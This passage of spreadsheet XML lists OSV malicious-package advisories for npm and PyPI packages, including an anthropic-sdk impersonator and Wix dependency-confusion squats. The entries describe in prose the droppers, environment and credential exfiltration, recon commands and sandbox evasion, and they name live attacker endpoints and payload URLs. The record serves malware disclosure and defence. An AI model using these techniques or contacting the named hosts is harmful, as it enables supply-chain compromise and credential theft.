      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>npm:shadowmd</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr"/>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">This package is part of a large family (100+ identified as of September 2026) of near-identical
forks of the Baileys WhatsApp Web library that inject a covert channel-subscription action into
the WhatsApp socket layer. On connect, the injected code issues an authenticated `w:mex` FOLLOW
query (query_id 7871414976211147) against one or more attacker-chosen WhatsApp Channel/Newsletter
JIDs, using the installer's own authenticated WhatsApp session -- silently subscribing the
victim's account to channels it never asked to join.
The target JID(s) are hidden from casual source review via one of several obfuscation techniques
observed across the family: a plain string literal, base64 encoding, base64+XOR, or a char-code
array reconstructed at runtime. Some variants instead fetch a mutable, attacker-controlled remote
JSON/JS list of target JIDs from GitHub or another host at runtime, letting the target list change
after installation without a new npm publish. Every sample in the family shares the same underlying
mechanism (a wrapped/patched socket-connect routine that fires the FOLLOW query some seconds after
connect), even though the package name, JID value(s), and obfuscation/delivery method differ per
fork.
The malicious action abuses the installer's own authenticated WhatsApp session to gain reach and
subscribers for attacker-controlled channels; it does not exfiltrate credentials, establish
persistence, or execute arbitrary remote code.
Affected package: shadowmd (npm), version(s): 8.6.87.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (926dc7dcc164af51175755e81a7a6eabb878244ecc173974ab577a1569ce1ff4)
lib/Socket/messages-send.js at lines 425 and 436 reconstructs the URL https://fiora.nixel.my.id/ from a String.fromCharCode decimal-ASCII array rather than a plain string literal. The host is assembled inside the package's WhatsApp socket message-send code path, so on every message-send flow the runtime resolves to an off-host destination whose identity is hidden from source-level inspection. Obfuscated destination reconstruction in a messaging library's send path is the fingerprint of a Baileys-family fork that intercepts or mirrors session/message data through an author-controlled endpoint; the destination fiora.nixel.my.id is unrelated to the WhatsApp protocol and is not documented as a caller-configurable endpoint.
</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17405</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17472</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>PyPI:anthropic-sdk</t>
        </is>
      </c>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr"/>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (500869e36b3f76202b63e8db9087adcfc42c8281a27a4402a21285aabde7a511)
The package publishes as `anthropic-sdk` and re-exports the official `anthropic` client's symbols (`from anthropic import *`; re-exports of `Anthropic`/`AsyncAnthropic`), presenting itself as a drop-in for the official SDK. On `import anthropic_sdk`, `__init__.py` imports a `_usage` module that auto-runs a boot routine. That routine increments a run counter persisted to `~/.config/anthropic-sdk/usage.json` and, from the third import onward, fetches `https://cdn.jsdelivr.net/gh/shred0day/payload@main/payload.py` — a third-party user's GitHub repository on a mutable branch, unrelated to Anthropic and with no pin or integrity check — then caches the response base64-encoded to `~/.config/anthropic-sdk/lr.json`, compiles it, `exec()`s it, and calls its `entry()` function. The import-count gate before the first fetch and the base64-at-rest caching of the fetched source serve no legitimate update-check purpose and are consistent with sandbox/analysis evasion. Whoever controls the referenced GitHub repository controls arbitrary code execution on any machine that imports this package.
## Source: kam193 (6844e60d4a58dd11040255e8d632bcca66ae02b1048674e79bddbac1b337f442)
During import, package downloads a remote script, fingerprints the environment looking for sandbox signs, and after a delay exfiltrates sensitive data: credentials, env variables, AI chat files, SSH keys and so on. If exfiltration via HTTPS fails, it attempts DNS-based exfiltration. Additionally, package uses DNS to centrally hold execution.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-10-anthropic-sdk
Reasons (based on the campaign):
 - impersonation
 - Downloads and executes a remote malicious script.
 - The package contains code to detect if it is running in a sandbox environment.
 - obfuscation
 - exfiltration-credentials
 - files-exfiltration
 - exfiltration-env-variables
 - exfiltration-ssh-keys
</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17472</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17473</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>npm:chai-as-testmode</t>
        </is>
      </c>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr"/>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (af5e91a44a2eb0773df19fce2096660c285bafbe846a5f09d8bb25ff0eba22b2)
The package masquerades as the pino logging library (README badges and lib/ contents mimic pino) but ships a dropper at lib/initializeCaller.js. A self-executing IIFE POSTs the full process.env object to a base64-concealed endpoint that decodes to https://ipcheck-hashed.vercel.app/api/auth/b4dadd6a26d820d08596, using an 'x-secret-header: secret' header, and then passes the HTTP response body to new Function('require', response.data) with require handed in — executing attacker-returned JavaScript in the installer's Node process. The transmitted payload is the entire environment (not a single named variable), which on developer and CI machines typically includes NPM_TOKEN, GITHUB_TOKEN, AWS_* credentials, and other CI secrets. The destination URL is stored base64-encoded to conceal it from casual inspection, and the typosquat-style package name together with pino-themed documentation form a cover story for the dropper.
</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17473</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17474</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>npm:core-js-gnz</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr"/>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dc57686b95f827f2c3b0501d97b6575e077247255bf5d4227ae9bc8bedd43937)
On install, package.json runs `node init.js` as a postinstall hook. init.js collects host identifiers (os.hostname(), os.userInfo().username, os.platform(), os.arch(), node version, OS release) and POSTs them to https://helper.businesse-vip1.workers.dev/report, then fetches an AES-256-GCM encrypted blob from the /e endpoint on the same host (with TLS verification disabled via rejectUnauthorized:false), decrypts it in-process, writes the decoded content to the user cache directory as exec_runtime.py, and spawns a detached python3 process to execute it (stdio:'ignore', windowsHide, detached:true). Execution is gated on developer-machine heuristics (presence of Desktop/Documents/Downloads in the home directory) and rate-limited via a hidden ~/.cache/core-js-buffer/.init_check marker, with cover-story identifiers ('Environment check', 'TelemetrySender', a BIP-174 seed label). The package name and README advertise an unrelated hex-buffer utility, which does not match the observed behavior.
</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17474</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17475</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>npm:css-a11y-contrast-utils</t>
        </is>
      </c>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr"/>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (85ad65ab7d49c4277898f5da5b5d45f3ec9cde46035bcf6416e3a95507ca1301)
css-a11y-contrast-utils@1.0.0 is advertised as a WCAG contrast utility but ships no contrast code — index.js exports an empty object. The package instead defines a Proxy stub exposing identifiers from Wix's internal Thunderbolt registry namespace (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.), and its manifest points at static.parastorage.com/unpkg/css-a11y-contrast-utils, consistent with a dependency-confusion squat targeting a private Wix registry. On module load, thunderboltRegistry.js runs an IIFE that executes `hostname`, `id`, and `uname -r` via child_process and exfiltrates the collected host, uid, kernel version, Node version, and pid by (a) issuing DNS lookups to subdomains of the hardcoded OAST collector davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live and (b) HTTP GET to the hardcoded webhook https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba. The cover-story metadata plus internal-registry naming plus the on-load recon beacon make the entire purpose of the package a dependency-confusion payload against installers that resolve any of these registry names.
</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17475</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17476</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>npm:css-anchor-pos-fallback</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr"/>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bd0a6c8e1448ffd9abb3732872ea3d49280a422d49524aaa57d0b89a73812f05)
The package advertises itself as a CSS anchor-position polyfill but on require executes an IIFE in thunderboltRegistry.js that runs `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and reads `/etc/hosts`, then POSTs the collected output along with hostname, platform, and Node version via fetch to the hardcoded external endpoint http://dxpoc.gt.tc/callback.php/. The module also exports keys named after Wix thunderbolt internal registries (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, etc.) with a bundled manifest referencing a parastorage.com unpkg URL, a shape consistent with dependency-confusion targeting of an internal Wix build pipeline. The advertised polyfill purpose is unrelated to shell execution, host reconnaissance, or outbound beaconing.
</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17476</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17477</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>npm:css-env-function-shim</t>
        </is>
      </c>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr"/>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (03e6fced50259d6d3781ef3917caba965e4744420188c3e06919541b64e2e294)
Package self-describes as a CSS env() shim but ships thunderboltRegistry.js, which runs an IIFE at module load that base64-decodes the strings 'child_process' and 'execSync', dynamically requires child_process, and shells out whoami, uname, cat /etc/hosts, ifconfig/ip addr, id, and hostname. The collected output is POSTed to a hardcoded webhook.site URL (webhook.site/0492a36c-4d7b-408a-865c-226db25987ba) and beaconed to a subdomain of davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live for DNS exfiltration. All sensitive identifiers (module name, method name, commands, destination host, UUID path, OAST subdomain) are stored as base64 blobs or String.fromCharCode arrays and reconstructed at runtime to defeat static inspection. index.js is a stub; the module factory is re-exported under nine Wix-internal registry key names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, and similar), and the shipped registry-manifest.min.json aliases numerous Wix thunderbolt *Registry.js URLs on parastorage.com to this package's thunderboltRegistry.js — a dependency-confusion lure targeting Wix's internal build so that any importer of those names triggers the exfiltration IIFE at require time.
</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17477</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17478</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>npm:css-field-sizing-polyfill</t>
        </is>
      </c>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr"/>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (549bb8820cb6a8a35853826d17b64df14c0561b83790192a33c5dc76dbad53b9)
The package advertises itself as a CSS field-sizing polyfill but ships thunderboltRegistry.js, which runs an IIFE at module load time. The IIFE shells out via child_process.execSync to run `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `cat /etc/hosts`, then transmits the collected output together with hostname, Node version, platform, and pid as query-string parameters to the hardcoded plaintext endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The module also exports proxied stubs for Wix-internal names (`thunderboltRegistry`, `siteAssetsRegistry`, `documentManagementRegistry`, `editorRegistry`, `corvidRegistry`) and ships a `registry-manifest.min.json` pointing at `static.parastorage.com`, indicating a dependency-confusion impersonation of Wix internal packages so that an internal resolver pulling this public name will trigger the beacon. The reconnaissance behavior is unrelated to the declared CSS polyfill purpose and fires on any `require()` of the package.
</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17478</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17479</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>npm:css-gap-decorations-polyfill</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr"/>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8126656cc344a4f632b8ddf5a23683fc92ac22798bb67e1aed6bca73ac82d7b6)
The package is published as a CSS polyfill but ships no polyfill functionality. On require(), thunderboltRegistry.js uses child_process.execSync to run whoami, uname -a, ifconfig/ip addr, and read /etc/hosts, then sends each result along with a beacon (node version, platform, pid) as query parameters to the hardcoded attacker-controlled endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package exposes stub factories under internal-sounding names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) and bundles a registry-manifest.min.json mapping them all to a single parastorage.com asset, consistent with a dependency-confusion attack targeting a private Wix/Thunderbolt package namespace. Installer harm: host identity, kernel version, network configuration, and /etc/hosts contents are exfiltrated to an attacker-controlled host simply by resolving and loading the package.
</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17479</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17480</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>npm:css-interop-observer-polyfill</t>
        </is>
      </c>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr"/>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (089bdc1dd6bdf0216bb911888e81ce97dc171bdef2588fd5de0aadb4a64fbb2b)
On module load, thunderboltRegistry.js executes an IIFE that runs id, whoami, uname, ifconfig/ip addr via child_process.execSync and reads /etc/hosts, then sends each result together with hostname, node version, platform and pid to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/[token] via fetch over plain HTTP. The package presents itself as a stub exporting proxies for Wix thunderbolt internal registry names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.), consistent with dependency-confusion targeting of those internal module names while the load-time code performs the host reconnaissance and exfiltration.
</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17480</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17481</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>npm:css-light-dark-polyfill</t>
        </is>
      </c>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr"/>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (856c154d7855924568c88181f172f46e84aac202bd6cb29974eb2ffaa3ec3ea7)
The package presents itself as a trivial CSS polyfill (index.js exports an empty object) but ships thunderboltRegistry.js, which on load runs a self-invoking IIFE that collects host identifiers (os.hostname, node version, platform, pid) and the output of local shell commands (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts via child_process.execSync) and POSTs each result via fetch() to the hardcoded endpoint https://dxpoc.gt.tc/callback.php/. The payload self-labels as 'beacon=rce-poc'. The package also exports factories under the names of internal Wix Thunderbolt build registries (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, etc.), and a bundled registry-manifest.min.json maps those names to parastorage.com URLs — a dependency-confusion shape targeting Wix-like build systems that resolve these internal registry module names. Installing or loading this package causes host reconnaissance data to be exfiltrated to an attacker-controlled domain unrelated to any CSS polyfill functionality.
</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17481</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17482</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>npm:css-logical-prop-shim</t>
        </is>
      </c>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr"/>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d0ffba65f80ee8f200199c8c90ebb6297b8590537c80ea50bb34874d91665b5f)
The package ships thunderboltRegistry.js which imports child_process and invokes execSync with curl commands at multiple sites (lines 30, 39, 47, 48). The declared purpose of the package is a CSS logical-property shim, which has no legitimate need to spawn shells or make outbound curl requests. The co-location of child_process + repeated execSync('curl...') calls in a package whose stated purpose is a frontend CSS polyfill is the shape of a dropper or exfiltration helper rather than library code, and the file name 'thunderboltRegistry' is unrelated to any CSS functionality.
</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17482</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17483</t>
        </is>
      </c>
      <c r="D17" s="5" t="inlineStr"/>
      <c r="E17" s="5" t="inlineStr"/>
      <c r="F17" s="5" t="inlineStr"/>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>npm:css-reading-flow-polyfill</t>
        </is>
      </c>
